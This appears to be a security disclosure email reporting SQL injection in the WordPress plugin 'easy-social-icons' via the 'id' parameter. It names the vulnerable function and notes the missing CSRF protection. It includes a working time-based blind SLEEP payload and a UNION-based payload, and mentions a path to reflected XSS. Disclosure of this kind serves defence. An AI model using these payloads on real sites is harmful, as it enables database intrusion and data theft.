Hello,
Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).
1. SQL injection ((cnss_social_icon_add_fn))
Method: GET
Vulnerable parameter: id
Example PHP callstack:
cnss_social_icon_add_fn [/easy-social-icons/easy-social-icons.php:563]
wpdb::get_results
Verification:
...
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: page=cnss_social_icon_add&mode=edit&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BirD)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: page=cnss_social_icon_add&mode=edit&id=1 UNION ALL SELECT CONCAT(0x71787a7671,0x70494a446c6e4368424c,0x7170716271),NULL,NULL,NULL,NULL,NULL,NULL--
...
Please note that this SQL injection can lead to reflected XSS (bypassing browser anti-xss filters , like Chrome XSS auditor)
--
Pozdrawiam,
Marcin Probola,